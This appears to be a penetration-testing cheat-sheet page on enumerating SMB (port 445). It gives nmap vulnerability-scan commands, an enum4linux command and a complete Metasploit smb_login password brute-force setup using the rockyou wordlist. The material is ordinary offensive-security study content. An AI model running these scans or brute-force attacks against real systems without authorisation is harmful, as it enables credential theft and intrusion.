445 - SMB

Theory

The SMB protocol operates on TCP port 445, and once enabled, you will see the NetBIOS TCP port 139 is opened as well. The enumeration process of an SMB protocol should be targeting the following items:

Share names
List of users
List of groups
Domain name
Accounts brute‐force
List of SMB vulnerable versions

Practical

Nmap Scan

nmap ‐sV ‐T5 ‐p 445 ‐sC <IP>

Nmap Script Scan

nmap ‐sV ‐p 445 ‐‐script=smb‐vuln* <IP>

nmap -sV -p 445 --script=smb-enum <IP>

Enum4Linux Tool

enum4linux -a [IP address]

Brute Force

Metasploit

msfconsole -q

use auxiliary/scanner/smb/smb_login

set BLANK_PASSWORDS true

set PASS_FILE /usr/share/wordlists/rockyou.txt

set RHOSTS <Target IP>

set SMBUser admin

set STOP_ON_SUCCESS true

set THREADS 100

set USER_AS_PASS true

set VERBOSE false

run

REFERENCES

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
https://0xdf.gitlab.io/2024/03/21/smb-cheat-sheet.html
https://systemweakness.com/how-to-enumerate-smb-for-ethical-hackers-and-pentesters-29e4ac4da3c4?gi=0ad739c0310f

Previous5900 - VNC Next161 UDP - SNMP

Last updated 9 months ago